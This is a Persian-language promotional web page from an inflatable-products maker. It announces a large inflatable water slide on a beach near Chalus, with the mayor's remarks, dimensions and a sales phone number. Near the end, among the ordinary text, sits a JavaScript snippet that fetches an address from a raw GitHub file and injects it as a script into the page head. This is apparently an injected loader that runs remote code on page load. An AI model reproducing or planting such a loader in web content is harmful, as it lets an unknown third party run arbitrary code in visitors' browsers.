بزرگ ترین سرسره آبی بادی جهان

  • بزرگ ترین سرسره آبی بادی جهان که واقعه در شهر چالود در سواحل رادیو دریا. این سرسره که محصول بادی سازان مجد دارای تمامی استاندارد ها جهانی می باشد.

    به گزارش خبرگزاری موج مازندران، دکتر مسعود یعقوبی اظهار داشت: پس از توافق شهرداری چالوس با سرمایه‌گذار بخش خصوصی و در راستای توسعه و فضاسازی مطلوب سواحل چالوس، بزرگترین پروژه سرسره آبی بادی ایران در ساحل رادیو دریا افتتاح و به بهره برداری رسید.

    وی ادامه داد: این سرسره آبی بادی در فضایی به مساحت حدود ۲۰۰۰ متر مربع و به ارتفاع ۱۸ متر و به طول تقریبی ۸۵ متر و به صورت U شکل پیاده سازی گردید.

    شهردار چالوس گفت: برنامه های مدون شهرداری چالوس در پی جذب سرمایه گذاران بخش خصوصی در جهت رفاه حال شهروندان و توسعه فضای شهری قدم به قدم در حال انجام است و امید می‌رود با انسجام مدیریت شهری دوره ششم چالوس شاهد اجرای پروژه های قابل انتظار و مهم باشیم.

    بزرگ ترین سرسره آبی بادی جهان

    جالب است بدانید سرسرهای بادی انعطاف پذیر می باشد و به راحتی پس از تخلیه باد قابل حمل و جابجایی می باشد و در محیط های سرپوشیده و سرباز مورد استفاده قرار میگیرد و در زمان اندکی در مکان مورد نظر نصب میشود.

    بزرگ ترین سرسره آبی بادی جهان

    سرسره بادی که به دو حالت خشک و با آب استفاده می شود در سال های اخیر بسیار طرفدار پیدا کرده است بخصوص که مسافران عزیزی که از تمامی نقاط کشور به سمت شمال کشور می آیند حتما برای تفریحات آبی به سراغ این سرسره ها می آیند و جزو یکی از پر هیجان ترین تفریحات درکنار ساحل می باشد. خصوصا که در کشور ما تفریحات آبی به نسبت کشور های دیگر بسیار کم است، حضور این مدل از سرسره های کم نظیر در کشور بسیار پر طرفدار است .

    مجموعه ابر سرسره دارای لوح تقدیر از بزرگترین تولید کننده تجهیزات بادی کشور به عنوان تنها مجموعه فعال در قاره آسیا می باشد. همچنین هدف و شعار مجموعه ایجاد شادی برای هم وطنان گرامی و گردشگران ساحلی کشور می باشد .

    نحوه خرید بزرگ ترین سرسره آبی بادی جهان

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید این بزرگ ترین سرسره آبی بادی جهان می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۵ رای

    دیدگاهتان را بنویسید